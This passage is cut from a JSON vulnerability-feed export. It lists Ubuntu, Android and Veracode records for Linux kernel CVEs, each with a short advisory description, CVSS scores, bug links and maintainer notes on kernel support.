<https://launchpad.net/bugs/1400314>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8134", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2014-12-08T00:00:00", "id": "UB:CVE-2014-8134", "href": "https://ubuntu.com/security/CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T13:52:50", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel\nbefore 4.14.3 allow local users to cause a denial of service (BUG) by\nleveraging a race condition with __dm_destroy during creation and removal\nof DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-02-27T00:00:00", "id": "UB:CVE-2017-18203", "href": "https://ubuntu.com/security/CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T13:55:46", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key\nManagement subcomponent in the Linux kernel before 4.13.5 does not properly\nconsider that a key may be possessed but negatively instantiated, which\nallows local users to cause a denial of service (OOPS and system crash) via\na crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-11T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2017-10-11T00:00:00", "id": "UB:CVE-2017-12192", "href": "https://ubuntu.com/security/CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T13:50:05", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in\nthe Linux kernel before 4.14.8 doesn't properly validate the\nsigevent->sigev_notify field, which leads to out-of-bounds access in the\nshow_timer function (called when /proc/$PID/timers is read). This allows\nuserspace applications to read arbitrary kernel memory (on a kernel built\nwith CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T00:00:00", "type": "ubuntucve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-07-26T00:00:00", "id": "UB:CVE-2017-18344", "href": "https://ubuntu.com/security/CVE-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T14:12:55", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel\nbefore 4.0.6 do not properly consider yielding a processor, which allows\nremote attackers to cause a denial of service (system hang) via incorrect\nchecksums within a UDP packet flood.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1472160>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5364", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-07-02T00:00:00", "id": "UB:CVE-2015-5364", "href": "https://ubuntu.com/security/CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:09:54", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows\nlocal users to gain privileges by triggering access to a paging structure\nby a different CPU.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1538429>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-26T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2069", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2016-01-26T00:00:00", "id": "UB:CVE-2016-2069", "href": "https://ubuntu.com/security/CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T14:10:17", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does\nnot properly identify error conditions, which allows remote attackers to\nexecute arbitrary code or cause a denial of service (use-after-free) via\ncrafted packets.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1545029>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2015-12-31T00:00:00", "id": "UB:CVE-2015-8812", "href": "https://ubuntu.com/security/CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:10:02", "description": "The join_session_keyring function in security/keys/process_keys.c in the\nLinux kernel before 4.4.1 mishandles object references in a certain error\ncase, which allows local users to gain privileges or cause a denial of\nservice (integer overflow and use-after-free) via crafted keyctl commands.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1534887>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0728", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "UB:CVE-2016-0728", "href": "https://ubuntu.com/security/CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:16:18", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function\nin drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux\nkernel through 3.16.3 allow physically proximate attackers to cause a\ndenial of service (system crash) or possibly execute arbitrary code via a\ncrafted device that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with an event.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1370025>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-09-28T00:00:00", "type": "ubuntucve", "title": "CVE-2014-3181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2014-09-28T00:00:00", "id": "UB:CVE-2014-3181", "href": "https://ubuntu.com/security/CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:18:57", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c\nin the Linux kernel before 3.13.4 allows local users to cause a denial of\nservice (system crash) by leveraging the CAP_MAC_ADMIN capability to set a\nzero-length security context.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-1874>\n * <https://launchpad.net/bugs/1279985>\n", "cvss3": {}, "published": "2014-02-07T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1874", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2014-02-07T00:00:00", "id": "UB:CVE-2014-1874", "href": "https://ubuntu.com/security/CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:20:13", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is\nenabled, does not properly initialize certain data structures, which allows\nlocal users to cause a denial of service (memory corruption and system\ncrash) or possibly gain privileges via a crafted application that uses the\nUDP_CORK option in a setsockopt system call and sends both short and long\npackets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c\nand the ip6_ufo_append_data function in net/ipv6/ip6_output.c.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4470>\n * <https://launchpad.net/bugs/1248703>\n", "cvss3": {}, "published": "2013-11-04T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2013-11-04T00:00:00", "id": "UB:CVE-2013-4470", "href": "https://ubuntu.com/security/CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:18:27", "description": "Use-after-free vulnerability in the skb_segment function in\nnet/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to\nobtain sensitive information from kernel memory by leveraging the absence\nof a certain orphaning operation.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1298119>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 13.10 preview kernels \n[apw](<https://launchpad.net/~apw>) | Also needs the following: a5c39b046fdf5025ab4d274edaf5d8f53326b34c skbuff: skb_segment: s/fskb/list_skb/ cff87de1c2625eadcd1b38f14d3a036e160aefa3 skbuff: skb_segment: s/skb/head_skb/ ef92873b71a1879a19d64575725a7bbf8c59d9f6 skbuff: skb_segment: s/skb_frag/frag/ c4d421e6e53be12b422b5d6ff93bf6c1d6cc83d5 skbuff: skb_segment: s/frag/nskb_frag/\n", "cvss3": {}, "published": "2014-03-24T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0131", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-03-24T00:00:00", "id": "UB:CVE-2014-0131", "href": "https://ubuntu.com/security/CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}], "android": [{"lastseen": "2021-07-28T14:34:31", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "android", "title": "CVE-2016-4794", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2019-07-29T00:00:00", "id": "ANDROID:CVE-2016-4794", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-4794.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:35", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-01T00:00:00", "type": "android", "title": "CVE-2016-0728", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2019-07-29T00:00:00", "id": "ANDROID:CVE-2016-0728", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0728.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T13:07:37", "description": "kernel is vulnerable to denial of service. It does not prevent an attacker to send malicious IPv4 packets to a misconfigured interface through the `nf_nat_redirect_ipv4` function in `net/netfilter/nf_nat_redirect.c`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-01T10:48:16", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8787"], "modified": "2023-01-19T17:42:13", "id": "VERACODE:13575", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13575/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T14:25:32", "description": "kernel is vulnerable to information disclosure. It was found that the espfix functionality does not work for 32-bit KVM paravirtualized guests. A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2019-05-02T05:29:38", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2023-02-13T01:49:27", "id": "VERACODE:16928", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16928/summary", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T14:25:35", "description": "Linux kernel is vulnerable to denial of service(DoS) attacks. An attacker could exploit a flaw in the `drivers/md/dm.c:dm_get_from_kobject()` function which could be caused by local users leveraging a race condition with `__dm_destroy() `during creation and removal of DM devices. \n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-16T02:50:39", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2022-04-19T18:13:37", "id": "VERACODE:19177", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19177/summary", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T14:00:12", "description": "Linux kernel is vulnerable to NULL pointer dereference vulnerability. This occurs in the Key Management sub component in Linux kernel when trying to issue a KEYTCL_READ on a negative key. Local attackers could cause a denial of service conditions via a crafted KEYCTL_READ operation. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-16T02:13:53", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2023-02-13T01:47:24", "id": "VERACODE:18887", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-18887/summary", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-04-18T14:24:41", 